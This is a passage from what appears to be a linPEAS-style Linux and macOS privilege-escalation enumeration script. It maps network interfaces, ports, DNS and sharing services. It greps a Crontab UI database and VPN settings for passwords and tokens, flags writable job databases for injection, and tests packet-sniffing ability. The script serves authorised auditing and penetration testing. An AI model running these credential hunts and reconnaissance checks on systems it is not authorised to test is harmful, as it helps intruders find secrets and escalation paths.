pwd='${pprint}'" | sed -${E} "s,pwd='[^']*',${SED_RED_YELLOW},g" 7928 fi 7929 if [ -n "$dbpath" ]; then 7930 echo " └─ CRON_DB_PATH: $dbpath" 7931 fi 7932 # Check listener bound to localhost 7933 [ -z "$port" ] && port=8000 7934 if command -v ss >/dev/null 2>&1; then 7935 if ss -ltn 2>/dev/null | grep -qE "127\.0\.0\.1:${port}[[:space:]]"; then 7936 echo " └─ Listener detected on 127.0.0.1:${port} (likely Crontab UI)." 7937 fi 7938 else 7939 if netstat -tnl 2>/dev/null | grep -qE "127\.0\.0\.1:${port}[[:space:]]"; then 7940 echo " └─ Listener detected on 127.0.0.1:${port} (likely Crontab UI)." 7941 fi 7942 fi 7943 # If we know DB path, try to read crontab.db for obvious secrets and check perms 7944 if [ -n "$dbpath" ] && [ -d "$dbpath" ] && [ -r "$dbpath" ]; then 7945 dbfile="$dbpath/crontab.db" 7946 if [ -f "$dbfile" ]; then 7947 perms=$(ls -ld "$dbpath" 2>/dev/null | awk '{print $1, $3, $4}') 7948 echo " └─ DB dir perms: $perms" 7949 if [ -w "$dbpath" ] || [ -w "$dbfile" ]; then 7950 echo " └─ Writable by current user -> potential job injection!" | sed -${E} "s,.*,${SED_RED},g" 7951 fi 7952 echo " └─ Inspecting $dbfile for embedded secrets in commands (zip -P / --password / pass/token/secret)..." 7953 grep -E "-P[[:space:]]+\S+|--password[[:space:]]+\S+|[Pp]ass(word)?|[Tt]oken|[Ss]ecret" "$dbfile" 2>/dev/null | head -n 20 | sed -${E} "s,(${SED_RED_YELLOW}),\1,g" 7954 fi 7955 fi 7956 fi 7957 echo "" 7958 done 7959 fi 7960 fi 7961 7962 fi 7963 7964 if check_mitre_filter "T1083"; then 7965 if [ "$(command -v lsof 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then 7966 print_2title "Deleted files still open" "T1083" 7967 print_info "Open deleted files can hide tools and still consume disk space" 7968 lsof +L1 2>/dev/null | sed -${E} "s,\\(deleted\\),${SED_RED},g" 7969 echo "" 7970 print_2title "Deleted executables still running" "T1083" 7971 print_info "A deleted /proc/<PID>/exe may indicate tampering, cleanup, or a useful runtime-only binary" 7972 ls -l /proc/[0-9]*/exe 2>/dev/null | grep "(deleted)" | sed -${E} "s,\\(deleted\\),${SED_RED},g" | head -n 200 7973 echo "" 7974 elif [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then 7975 print_2title "Deleted files still open" "T1083" 7976 print_info "lsof not found, scanning /proc for deleted file descriptors" 7977 ls -l /proc/[0-9]*/fd 2>/dev/null | grep "(deleted)" | sed -${E} "s,\\(deleted\\),${SED_RED},g" | head -n 200 7978 echo "" 7979 print_2title "Deleted executables still running" "T1083" 7980 print_info "Scanning /proc/<PID>/exe for deleted runtime binaries" 7981 ls -l /proc/[0-9]*/exe 2>/dev/null | grep "(deleted)" | sed -${E} "s,\\(deleted\\),${SED_RED},g" | head -n 200 7982 echo "" 7983 fi 7984 7985 fi 7986 7987 fi 7988 7989 fi 7990 echo '' 7991 echo '' 7992 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 7993 7994 if echo $CHECKS | grep -q network_information; then 7995 if check_mitre_filter "T1016,T1590,T1018,T1040,T1049"; then 7996 print_title "Network Information" 7997 if check_mitre_filter "T1016"; then 7998 # Function to parse network interfaces from /proc/net/dev and other sources 7999 parse_network_interfaces() { 8000 # Try to get interfaces from /proc/net/dev 8001 if [ -f "/proc/net/dev" ]; then 8002 echo "Network Interfaces from /proc/net/dev:" 8003 echo "----------------------------------------" 8004 # Skip header lines and format output 8005 grep -v "^Inter\|^ face" /proc/net/dev | while read -r line; do 8006 iface=$(echo "$line" | awk -F: '{print $1}' | tr -d ' ') 8007 if [ -n "$iface" ]; then 8008 echo "Interface: $iface" 8009 # Try to get IP address from /sys/class/net 8010 if [ -f "/sys/class/net/$iface/address" ]; then 8011 mac=$(cat "/sys/class/net/$iface/address" 2>/dev/null) 8012 echo " MAC: $mac" 8013 fi 8014 # Try to get IP from /sys/class/net 8015 if [ -d "/sys/class/net/$iface/ipv4" ]; then 8016 for ip_file in /sys/class/net/$iface/ipv4/addr_*; do 8017 if [ -f "$ip_file" ]; then 8018 ip=$(cat "$ip_file" 2>/dev/null) 8019 echo " IP: $ip" 8020 fi 8021 done 8022 fi 8023 # Get interface state 8024 if [ -f "/sys/class/net/$iface/operstate" ]; then 8025 state=$(cat "/sys/class/net/$iface/operstate" 2>/dev/null) 8026 echo " State: $state" 8027 fi 8028 echo "" 8029 fi 8030 done 8031 fi 8032 # Try to get additional info from /proc/net/fib_trie 8033 if [ -f "/proc/net/fib_trie" ]; then 8034 echo "Additional IP Information from fib_trie:" 8035 echo "----------------------------------------" 8036 grep -A1 "Main" /proc/net/fib_trie | grep -v "\-\-" | while read -r line; do 8037 if echo "$line" | grep -q "Main"; then 8038 echo "Network: $(echo "$line" | awk '{print $2}')" 8039 elif echo "$line" | grep -q "/"; then 8040 echo " IP: $(echo "$line" | awk '{print $2}')" 8041 fi 8042 done 8043 fi 8044 } 8045 print_2title "Interfaces" "T1016" 8046 cat /etc/networks 2>/dev/null 8047 # Try standard tools first, then fall back to our custom function 8048 if command -v ifconfig >/dev/null 2>&1; then 8049 ifconfig 2>/dev/null 8050 elif command -v ip >/dev/null 2>&1; then 8051 ip a 2>/dev/null 8052 else 8053 parse_network_interfaces 8054 fi 8055 if command -v ip >/dev/null 2>&1; then 8056 print_3title "Routing & policy quick view" "T1016" 8057 ip route 2>/dev/null 8058 ip -6 route 2>/dev/null | head -n 30 8059 echo "" 8060 ip rule 2>/dev/null 8061 print_3title "Virtual/overlay interfaces quick view" "T1016" 8062 ip -d link 2>/dev/null | grep -E "^[0-9]+:|veth|docker|cni|flannel|br-|bridge|vlan|bond|tun|tap|wg|tailscale" | sed -${E} "s,veth|docker|cni|flannel|br-|bridge|vlan|bond|tun|tap|wg|tailscale,${SED_RED_YELLOW},g" 8063 print_3title "Network namespaces quick view" "T1016" 8064 ip netns list 2>/dev/null 8065 ls -la /var/run/netns/ 2>/dev/null 8066 fi 8067 print_3title "Forwarding status" "T1016" 8068 sysctl net.ipv4.ip_forward net.ipv6.conf.all.forwarding 2>/dev/null | sed -${E} "s,=[[:space:]]*1,${SED_RED_YELLOW},g" 8069 echo "" 8070 8071 fi 8072 8073 if check_mitre_filter "T1016,T1018"; then 8074 # Function to get hostname using multiple methods 8075 get_hostname_info() { 8076 print_3title "Hostname Information" "T1016,T1018" 8077 # Try multiple methods to get hostname 8078 if command -v hostname >/dev/null 2>&1; then 8079 echo "System hostname: $(hostname 2>/dev/null)" 8080 echo "FQDN: $(hostname -f 2>/dev/null)" 8081 else 8082 # Fallback methods 8083 if [ -f "/proc/sys/kernel/hostname" ]; then 8084 echo "System hostname: $(cat /proc/sys/kernel/hostname 2>/dev/null)" 8085 fi 8086 if [ -f "/etc/hostname" ]; then 8087 echo "Hostname from /etc/hostname: $(cat /etc/hostname 2>/dev/null)" 8088 fi 8089 fi 8090 echo "" 8091 } 8092 # Function to get hosts file information 8093 get_hosts_info() { 8094 print_3title "Hosts File Information" "T1016,T1018" 8095 if [ -f "/etc/hosts" ]; then 8096 echo "Contents of /etc/hosts:" 8097 grep -v "^#" /etc/hosts 2>/dev/null | grep -v "^$" | while read -r line; do 8098 echo " $line" 8099 done 8100 fi 8101 echo "" 8102 } 8103 # Function to get DNS information 8104 get_dns_info() { 8105 print_3title "DNS Configuration" "T1016,T1018" 8106 # Get resolv.conf information 8107 if [ -f "/etc/resolv.conf" ]; then 8108 echo "DNS Servers (resolv.conf):" 8109 grep -v "^#" /etc/resolv.conf 2>/dev/null | grep -v "^$" | while read -r line; do 8110 if echo "$line" | grep -q "nameserver"; then 8111 echo " $(echo "$line" | awk '{print $2}')" 8112 elif echo "$line" | grep -q "search\|domain"; then 8113 echo " $line" 8114 fi 8115 done 8116 fi 8117 # Check for systemd-resolved configuration 8118 if [ -f "/etc/systemd/resolved.conf" ]; then 8119 echo -e "\nSystemd-resolved configuration:" 8120 grep -v "^#" /etc/systemd/resolved.conf 2>/dev/null | grep -v "^$" | while read -r line; do 8121 echo " $line" 8122 done 8123 fi 8124 # Check for NetworkManager DNS settings 8125 if [ -d "/etc/NetworkManager" ]; then 8126 echo -e "\nNetworkManager DNS settings:" 8127 find /etc/NetworkManager -type f -name "*.conf" 2>/dev/null | while read -r conf; do 8128 if grep -q "dns=" "$conf" 2>/dev/null; then 8129 echo " From $conf:" 8130 grep "dns=" "$conf" 2>/dev/null | while read -r line; do 8131 echo " $line" 8132 done 8133 fi 8134 done 8135 fi 8136 # Try to get DNS domain name 8137 echo -e "\nDNS Domain Information:" 8138 if command -v dnsdomainname >/dev/null 2>&1; then 8139 warn_exec dnsdomainname 2>/dev/null 8140 fi 8141 if command -v domainname >/dev/null 2>&1; then 8142 warn_exec domainname 2>/dev/null 8143 fi 8144 # Check for DNS cache status 8145 if command -v systemd-resolve >/dev/null 2>&1; then 8146 echo -e "\nDNS Cache Status (systemd-resolve):" 8147 systemd-resolve --status 2>/dev/null | grep -A5 "DNS Servers" | grep -v "\-\-" | while read -r line; do 8148 echo " $line" 8149 done 8150 fi 8151 echo "" 8152 } 8153 print_2title "Hostname, hosts and DNS" "T1016,T1018" 8154 # Execute all information gathering functions 8155 get_hostname_info 8156 get_hosts_info 8157 get_dns_info 8158 8159 fi 8160 8161 if check_mitre_filter "T1018,T1040"; then 8162 # Function to parse routing information from /proc/net/route 8163 parse_proc_route() { 8164 print_3title "Routing Table (from /proc/net/route)" "T1018,T1040" 8165 echo "Destination Gateway Genmask Flags Metric Ref Use Iface" 8166 echo "--------------------------------------------------------------------------------" 8167 # Skip header line and process each route 8168 tail -n +2 /proc/net/route 2>/dev/null | while read -r line; do 8169 if [ -n "$line" ]; then 8170 # Extract fields 8171 iface=$(echo "$line" | awk '{print $1}') 8172 dest=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($2,7,2), substr($2,5,2), substr($2,3,2), substr($2,1,2)}')) 8173 gw=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($3,7,2), substr($3,5,2), substr($3,3,2), substr($3,1,2)}')) 8174 mask=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($4,7,2), substr($4,5,2), substr($4,3,2), substr($4,1,2)}')) 8175 flags=$(echo "$line" | awk '{print $5}') 8176 metric=$(echo "$line" | awk '{print $6}') 8177 ref=$(echo "$line" | awk '{print $7}') 8178 use=$(echo "$line" | awk '{print $8}') 8179 # Print formatted output 8180 printf "%-18s %-15s %-15s %-6s %-6s %-6s %-6s %s\n" "$dest" "$gw" "$mask" "$flags" "$metric" "$ref" "$use" "$iface" 8181 fi 8182 done 8183 echo "" 8184 } 8185 # Function to parse ARP information from /proc/net/arp 8186 parse_proc_arp() { 8187 print_3title "ARP Table (from /proc/net/arp)" "T1018,T1040" 8188 echo "IP address HW type Flags HW address Mask Device" 8189 echo "------------------------------------------------------------------------" 8190 # Skip header line and process each ARP entry 8191 tail -n +2 /proc/net/arp 2>/dev/null | while read -r line; do 8192 if [ -n "$line" ]; then 8193 ip=$(echo "$line" | awk '{print $1}') 8194 hwtype=$(echo "$line" | awk '{print $2}') 8195 flags=$(echo "$line" | awk '{print $3}') 8196 hwaddr=$(echo "$line" | awk '{print $4}') 8197 mask=$(echo "$line" | awk '{print $5}') 8198 device=$(echo "$line" | awk '{print $6}') 8199 # Print formatted output 8200 printf "%-15s %-11s %-9s %-18s %-8s %s\n" "$ip" "$hwtype" "$flags" "$hwaddr" "$mask" "$device" 8201 fi 8202 done 8203 echo "" 8204 } 8205 # Function to get network neighbors information 8206 get_network_neighbors() { 8207 print_2title "Networks and neighbours" "T1018,T1040" 8208 # Get routing information 8209 print_3title "Routing Information" "T1018,T1040" 8210 if [ "$MACPEAS" ]; then 8211 # macOS specific 8212 if command -v netstat >/dev/null 2>&1; then 8213 netstat -rn 2>/dev/null 8214 else 8215 echo "No routing information available" 8216 fi 8217 else 8218 # Linux systems 8219 if command -v ip >/dev/null 2>&1; then 8220 ip route 2>/dev/null 8221 echo -e "\nNeighbor table:" 8222 ip neigh 2>/dev/null 8223 elif command -v route >/dev/null 2>&1; then 8224 route -n 2>/dev/null 8225 elif [ -f "/proc/net/route" ]; then 8226 parse_proc_route 8227 else 8228 echo "No routing information available" 8229 fi 8230 fi 8231 # Get ARP information 8232 print_3title "ARP Information" "T1018,T1040" 8233 if command -v arp >/dev/null 2>&1; then 8234 if [ "$MACPEAS" ]; then 8235 arp -a 2>/dev/null 8236 else 8237 arp -e 2>/dev/null || arp -a 2>/dev/null 8238 fi 8239 elif [ -f "/proc/net/arp" ]; then 8240 parse_proc_arp 8241 else 8242 echo "No ARP information available" 8243 fi 8244 # Additional neighbor discovery methods 8245 print_3title "Additional Neighbor Information" "T1018,T1040" 8246 # Check for IPv6 neighbors if available 8247 if [ -f "/proc/net/ipv6_neigh" ]; then 8248 echo "IPv6 Neighbors:" 8249 cat /proc/net/ipv6_neigh 2>/dev/null | grep -v "^IP" | while read -r line; do 8250 if [ -n "$line" ]; then 8251 echo " $line" 8252 fi 8253 done 8254 fi 8255 # Try to get LLDP neighbors if available 8256 if command -v lldpctl >/dev/null 2>&1; then 8257 echo -e "\nLLDP Neighbors:" 8258 lldpctl 2>/dev/null | grep -A2 "Interface:" | while read -r line; do 8259 echo " $line" 8260 done 8261 fi 8262 # Try to get CDP neighbors if available 8263 if command -v cdp >/dev/null 2>&1; then 8264 echo -e "\nCDP Neighbors:" 8265 cdp 2>/dev/null | grep -v "^$" | while read -r line; do 8266 echo " $line" 8267 done 8268 fi 8269 echo "" 8270 } 8271 if [ "$EXTRA_CHECKS" ]; then 8272 get_network_neighbors 8273 fi 8274 8275 fi 8276 8277 if check_mitre_filter "T1049"; then 8278 # Function to get process info from inode 8279 get_process_info() { 8280 local inode=$1 8281 local pid="" 8282 local program="" 8283 if [ -n "$inode" ]; then 8284 for pid_dir in /proc/[0-9]*/fd; do 8285 if [ -d "$pid_dir" ]; then 8286 if ls -l "$pid_dir" 2>/dev/null | grep -q "$inode"; then 8287 pid=$(echo "$pid_dir" | awk -F/ '{print $3}') 8288 if [ -f "/proc/$pid/cmdline" ]; then 8289 program=$(tr '\0' ' ' < "/proc/$pid/cmdline" | cut -d' ' -f1) 8290 program=$(basename "$program") 8291 fi 8292 break 8293 fi 8294 fi 8295 done 8296 fi 8297 echo "$pid/$program" 8298 } 8299 # Function to parse /proc/net/tcp and /proc/net/udp files 8300 parse_proc_net_ports() { 8301 local proto=$1 8302 local proc_file="/proc/net/$proto" 8303 local header="Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name" 8304 local header_sep="--------------------------------------------------------------------------------" 8305 if [ -f "$proc_file" ]; then 8306 print_3title "Active $proto Ports (from /proc/net/$proto)" "T1049" 8307 echo "$header" 8308 echo "$header_sep" 8309 # Process each connection using a pipe 8310 tail -n +2 "$proc_file" 2>/dev/null | while IFS= read -r line; do 8311 [ -z "$line" ] && continue 8312 # Skip header 8313 case "$line" in 8314 *"sl"*) continue ;; 8315 *) : ;; 8316 esac 8317 # Extract fields using awk 8318 sl=$(echo "$line" | awk '{print $1}') 8319 local_addr=$(echo "$line" | awk '{print $2}') 8320 rem_addr=$(echo "$line" | awk '{print $3}') 8321 st=$(echo "$line" | awk '{print $4}') 8322 tx_queue=$(echo "$line" | awk '{print $5}') 8323 rx_queue=$(echo "$line" | awk '{print $6}') 8324 uid=$(echo "$line" | awk '{print $7}') 8325 inode=$(echo "$line" | awk '{print $10}') 8326 # Convert hex IP:port to decimal 8327 local_ip=$(printf "%d.%d.%d.%d" $(echo "$local_addr" | awk -F: '{printf "0x%s 0x%s 0x%s 0x%s", substr($1,7,2), substr($1,5,2), substr($1,3,2), substr($1,1,2)}')) 8328 local_port=$(printf "%d" "0x$(echo "$local_addr" | awk -F: '{print $2}')") 8329 rem_ip=$(printf "%d.%d.%d.%d" $(echo "$rem_addr" | awk -F: '{printf "0x%s 0x%s 0x%s 0x%s", substr($1,7,2), substr($1,5,2), substr($1,3,2), substr($1,1,2)}')) 8330 rem_port=$(printf "%d" "0x$(echo "$rem_addr" | awk -F: '{print $2}')") 8331 # Get process information 8332 proc_info=$(get_process_info "$inode") 8333 # Get state name 8334 case $st in 8335 "01") state="ESTABLISHED" ;; 8336 "02") state="SYN_SENT" ;; 8337 "03") state="SYN_RECV" ;; 8338 "04") state="FIN_WAIT1" ;; 8339 "05") state="FIN_WAIT2" ;; 8340 "06") state="TIME_WAIT" ;; 8341 "07") state="CLOSE" ;; 8342 "08") state="CLOSE_WAIT" ;; 8343 "09") state="LAST_ACK" ;; 8344 "0A") state="LISTEN" ;; 8345 "0B") state="CLOSING" ;; 8346 "0C") state="NEW_SYN_RECV" ;; 8347 *) state="UNKNOWN" ;; 8348 esac 8349 # Only show listening ports 8350 if [ "$state" = "LISTEN" ]; then 8351 # Format the output 8352 printf "%-6s %-8s %-8s %-21s %-21s %-12s %s\n" \ 8353 "$proto" "$rx_queue" "$tx_queue" "$local_ip:$local_port" "$rem_ip:$rem_port" "$state" "$proc_info" 8354 fi 8355 done 8356 fi 8357 echo "" 8358 } 8359 # Function to get open ports information 8360 get_open_ports() { 8361 print_2title "Active Ports" "T1049" 8362 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports" 8363 # Try standard tools first 8364 if command -v netstat >/dev/null 2>&1; then 8365 print_3title "Active Ports (netstat)" "T1049" 8366 netstat -punta 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g" 8367 elif command -v ss >/dev/null 2>&1; then 8368 print_3title "Active Ports (ss)" "T1049" 8369 ss -nltpu 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g" 8370 else 8371 # Fallback to parsing /proc/net files 8372 parse_proc_net_ports "tcp" 8373 parse_proc_net_ports "udp" 8374 fi 8375 # Focused local service exposure view 8376 print_3title "Local-only listeners (loopback)" "T1049" 8377 if command -v ss >/dev/null 2>&1; then 8378 ss -nltpu 2>/dev/null | grep -E "127\.0\.0\.1:|::1:" | sed -${E} "s,127\.0\.0\.1:|::1:,${SED_RED},g" 8379 elif command -v netstat >/dev/null 2>&1; then 8380 netstat -punta 2>/dev/null | grep -i listen | grep -E "127\.0\.0\.1:|::1:" | sed -${E} "s,127\.0\.0\.1:|::1:,${SED_RED},g" 8381 fi 8382 print_3title "Unique listener bind addresses" "T1049" 8383 if command -v ss >/dev/null 2>&1; then 8384 ss -nltpuH 2>/dev/null | awk '{ 8385 a=$5 8386 if (a ~ /^\[/) { 8387 sub(/^\[/, "", a) 8388 sub(/\]:[0-9]+$/, "", a) 8389 } else if (a ~ /:[0-9]+$/) { 8390 sub(/:[0-9]+$/, "", a) 8391 } 8392 sub(/^::ffff:/, "", a) 8393 if (a != "") print a 8394 }' | sort -u | sed -${E} "s,127\.0\.0\.1|::1,${SED_RED},g" 8395 elif command -v netstat >/dev/null 2>&1; then 8396 netstat -punta 2>/dev/null | grep -i listen | awk '{ 8397 a=$4 8398 if (a ~ /^\[/) { 8399 sub(/^\[/, "", a) 8400 sub(/\]:[0-9]+$/, "", a) 8401 } else if (a ~ /:[0-9]+$/) { 8402 sub(/:[0-9]+$/, "", a) 8403 } 8404 if (a == ":::" ) a="::" 8405 sub(/^::ffff:/, "", a) 8406 if (a != "") print a 8407 }' | sort -u | sed -${E} "s,127\.0\.0\.1|::1,${SED_RED},g" 8408 fi 8409 print_3title "Potential local forwarders/relays" "T1049" 8410 ps aux 2>/dev/null | grep -E "[s]ocat|[s]sh .*(-L|-R|-D)|[n]cat|[n]c .*-l" | sed -${E} "s,socat|ssh|-L|-R|-D|ncat|nc,${SED_RED_YELLOW},g" 8411 # Additional port information 8412 if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then 8413 print_3title "Additional Port Information" "T1049" 8414 # Check for listening ports in /proc/net/unix 8415 if [ -f "/proc/net/unix" ]; then 8416 echo "Unix Domain Sockets:" 8417 # Use awk to process the file in one go, avoiding duplicates and empty paths 8418 awk '$8 != "" && $8 != "@" && $8 != "00000000" { 8419 inode=$7 8420 socket=$8 8421 # Find process using inode 8422 cmd="find /proc/[0-9]*/fd -ls 2>/dev/null | grep " inode " | head -n1 | awk \"{print \\$11}\" | xargs -r readlink" 8423 pid="" 8424 while (cmd | getline pid_dir) { 8425 if (pid_dir != "") { 8426 split(pid_dir, parts, "/") 8427 pid=parts[3] 8428 break 8429 } 8430 } 8431 close(cmd) 8432 if (pid != "") { 8433 cmd="tr \\0 \" \" < /proc/" pid "/cmdline 2>/dev/null | cut -d\" \" -f1 | xargs -r basename" 8434 cmd | getline prog 8435 close(cmd) 8436 if (prog != "") { 8437 print " " socket " (" pid "/" prog ")" 8438 } else { 8439 print " " socket " (" pid ")" 8440 } 8441 } else { 8442 print " " socket 8443 } 8444 }' /proc/net/unix 2>/dev/null | sort -u 8445 fi 8446 # Check for ports in use by systemd 8447 if command -v systemctl >/dev/null 2>&1; then 8448 echo -e "\nSystemd Socket Units:" 8449 systemctl list-sockets 2>/dev/null | while IFS= read -r line; do 8450 [ -z "$line" ] && continue 8451 if ! echo "$line" | grep -q "UNIT\|listed"; then 8452 echo " $line" 8453 fi 8454 done 8455 fi 8456 fi 8457 echo "" 8458 } 8459 get_open_ports 8460 8461 fi 8462 8463 if check_mitre_filter "T1016"; then 8464 # Function to get network capabilities information 8465 get_macos_network_capabilities() { 8466 print_2title "Network Capabilities" "T1016" 8467 # Basic network information 8468 echo "" 8469 print_3title "Network Interfaces and Configuration" "T1016" 8470 warn_exec system_profiler SPNetworkDataType 8471 # Network locations 8472 echo "" 8473 print_3title "Network Locations" "T1016" 8474 warn_exec system_profiler SPNetworkLocationDataType 8475 # Network extensions 8476 echo "" 8477 print_3title "Network Extensions" "T1016" 8478 if [ -d "/Library/SystemExtensions" ]; then 8479 warn_exec systemextensionsctl list 8480 fi 8481 # Network security 8482 echo "" 8483 print_3title "Network Security" "T1016" 8484 if command -v networksetup >/dev/null 2>&1; then 8485 echo "Firewall Status:" 8486 warn_exec networksetup -getglobalstate 8487 echo -e "\nFirewall Rules:" 8488 warn_exec networksetup -listallnetworkservices | while read -r net_service; do 8489 if [ -n "$net_service" ]; then 8490 echo "Service: $net_service" 8491 warn_exec networksetup -getwebproxy "$net_service" 8492 warn_exec networksetup -getsecurewebproxy "$net_service" 8493 warn_exec networksetup -getproxybypassdomains "$net_service" 8494 fi 8495 done 8496 fi 8497 # Additional network information if EXTRA_CHECKS is enabled 8498 if [ "$EXTRA_CHECKS" ]; then 8499 # Network preferences 8500 echo "" 8501 print_3title "Network Preferences" "T1016" 8502 if [ -f "/Library/Preferences/SystemConfiguration/preferences.plist" ]; then 8503 warn_exec plutil -p /Library/Preferences/SystemConfiguration/preferences.plist | grep -A 5 "NetworkServices" 8504 fi 8505 # Network statistics 8506 echo "" 8507 print_3title "Network Statistics" "T1016" 8508 warn_exec netstat -s 8509 # Network routes 8510 echo "" 8511 print_3title "Network Routes" "T1016" 8512 warn_exec netstat -rn 8513 # Network interfaces details 8514 echo "" 8515 print_3title "Network Interfaces Details" "T1016" 8516 warn_exec ifconfig -a 8517 # Network kernel extensions 8518 echo "" 8519 print_3title "Network Kernel Extensions" "T1016" 8520 warn_exec kextstat | grep -i network 8521 fi 8522 echo "" 8523 } 8524 if [ "$MACPEAS" ]; then 8525 get_macos_network_capabilities 8526 fi 8527 8528 fi 8529 8530 if check_mitre_filter "T1016"; then 8531 # Function to check if a port is listening 8532 check_listening_port() { 8533 local port=$1 8534 local service=$2 8535 local count=0 8536 # Check both IPv4 and IPv6 8537 count=$(netstat -na 2>/dev/null | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.${port}" | wc -l) 8538 echo "$count" 8539 } 8540 # Function to get sharing services status 8541 get_sharing_services_status() { 8542 print_2title "MacOS Sharing Services Status" "T1016" 8543 # Define services and their ports using parallel arrays 8544 services="Screen Sharing File Sharing Remote Login Remote Management Remote Apple Events Back to My Mac AirPlay Receiver AirDrop Bonjour Printer Sharing Internet Sharing" 8545 ports="5900 88,445,548 22 3283 3031 4488 7000 5353 5353 515,631 67,68" 8546 # Check each service 8547 echo "Service Status (0=OFF, >0=ON):" 8548 echo "--------------------------------" 8549 # Get number of services 8550 service_count=$(echo "$services" | wc -w) 8551 # Loop through services using index 8552 i=1 8553 while [ $i -le $service_count ]; do 8554 sharing_service=$(echo "$services" | cut -d' ' -f$i) 8555 port_list=$(echo "$ports" | cut -d' ' -f$i) 8556 total=0 8557 active_ports="" 8558 # Check each port for the service 8559 port1=$(echo "$port_list" | cut -d',' -f1) 8560 port2=$(echo "$port_list" | cut -d',' -f2) 8561 port3=$(echo "$port_list" | cut -d',' -f3) 8562 for port in $port1 $port2 $port3; do 8563 if [ -n "$port" ]; then 8564 count=$(check_listening_port "$port" "$sharing_service") 8565 if [ "$count" -gt 0 ]; then 8566 total=$((total + count)) 8567 if [ -n "$active_ports" ]; then 8568 active_ports="${active_ports}," 8569 fi 8570 active_ports="${active_ports}${port}" 8571 fi 8572 fi 8573 done 8574 # Print service status 8575 if [ "$total" -gt 0 ]; then 8576 printf "%-20s: ON (Ports: %s)\n" "$sharing_service" "$active_ports" | sed -${E} "s,ON.*,${SED_RED},g" 8577 else 8578 printf "%-20s: OFF\n" "$sharing_service" 8579 fi 8580 i=$((i + 1)) 8581 done 8582 echo "" 8583 } 8584 # Function to get VPN information 8585 get_vpn_info() { 8586 print_3title "VPN Information" "T1016" 8587 # Get VPN configurations 8588 warn_exec system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED},g" 8589 # Check for VPN profiles 8590 if [ -d "/Library/Preferences/SystemConfiguration" ]; then 8591 echo -e "\nVPN Profiles:" 8592 find /Library/Preferences/SystemConfiguration -name "*.plist" -exec grep -l "VPN" {} \; 2>/dev/null | while read -r profile; do 8593 echo "Profile: $profile" 8594 warn_exec plutil -p "$profile" | grep -A 5 "VPN" 8595 done 8596 fi 8597 echo "" 8598 } 8599 # Function to get firewall information 8600 get_firewall_info() { 8601 print_3title "Firewall Information" "T1016" 8602 # Get firewall status 8603 warn_exec system_profiler SPFirewallDataType 8604 # Get application firewall rules 8605 if command -v /usr/libexec/ApplicationFirewall/socketfilterfw >/dev/null 2>&1; then 8606 echo -e "\nApplication Firewall Rules:" 8607 warn_exec /usr/libexec/ApplicationFirewall/socketfilterfw --listapps 8608 fi 8609 # Get pf firewall rules if available 8610 if command -v pfctl >/dev/null 2>&1; then 8611 echo -e "\nPF Firewall Rules:" 8612 warn_exec pfctl -s rules 2>/dev/null 8613 fi 8614 echo "" 8615 } 8616 # Function to get additional network information 8617 get_additional_network_info() { 8618 if [ "$EXTRA_CHECKS" ]; then 8619 print_3title "Additional Network Information" "T1016" 8620 # Bluetooth information 8621 echo "Bluetooth Status:" 8622 warn_exec system_profiler SPBluetoothDataType 8623 # Ethernet information 8624 echo -e "\nEthernet Status:" 8625 warn_exec system_profiler SPEthernetDataType 8626 # USB network adapters 8627 echo -e "\nUSB Network Adapters:" 8628 warn_exec system_profiler SPUSBDataType 8629 # Network kernel extensions 8630 echo -e "\nNetwork Kernel Extensions:" 8631 warn_exec kextstat | grep -i "network\|ethernet\|wifi\|bluetooth" 8632 # Network daemons 8633 echo -e "\nNetwork Daemons:" 8634 warn_exec launchctl list | grep -i "network\|vpn\|firewall\|sharing" 8635 fi 8636 echo "" 8637 } 8638 # Main function to get all network services information 8639 get_macos_network_services() { 8640 if [ "$MACPEAS" ]; then 8641 # Get sharing services status 8642 get_sharing_services_status 8643 # Get VPN information 8644 get_vpn_info 8645 # Get firewall information 8646 get_firewall_info 8647 # Get additional network information if EXTRA_CHECKS is enabled 8648 get_additional_network_info 8649 fi 8650 } 8651 if [ "$MACPEAS" ]; then 8652 get_macos_network_services 8653 fi 8654 8655 fi 8656 8657 if check_mitre_filter "T1040"; then 8658 # Function to check if a command exists and is executable 8659 check_command() { 8660 local cmd=$1 8661 if command -v "$cmd" >/dev/null 2>&1; then 8662 if [ -x "$(command -v "$cmd")" ]; then 8663 return 0 8664 fi 8665 fi 8666 return 1 8667 } 8668 # Function to check if we can sniff on an interface 8669 check_interface_sniffable() { 8670 local iface=$1 8671 if check_command tcpdump; then 8672 if timeout 1 tcpdump -i "$iface" -c 1 >/dev/null 2>&1; then 8673 return 0 8674 fi 8675 elif check_command dumpcap; then 8676 dumpcap_test_file="/tmp/.linpeas_dumpcap_test_$$.pcap" 8677 if timeout 2 dumpcap -i "$iface" -c 1 -q -w "$dumpcap_test_file" >/dev/null 2>&1; then 8678 rm -f "$dumpcap_test_file" 2>/dev/null 8679 return 0 8680 fi 8681 rm -f "$dumpcap_test_file" 2>/dev/null 8682 fi 8683 return 1 8684 } 8685 # Function to check for promiscuous mode 8686 check_promiscuous_mode() { 8687 local iface=$1 8688 if ip link show "$iface" 2>/dev/null | grep -q "PROMISC"; then 8689 return 0 8690 fi 8691 return 1 8692 } 8693 # Main function to check network traffic analysis capabilities 8694 check_network_traffic_analysis() { 8695 print_2title "Network Traffic Analysis Capabilities" "T1040" 8696 # Check for sniffing tools 8697 echo "" 8698 print_3title "Available Sniffing Tools" "T1040" 8699 tools_found=0 8700 if check_command tcpdump; then 8701 echo "tcpdump is available" | sed -${E} "s,.*,${SED_GREEN},g" 8702 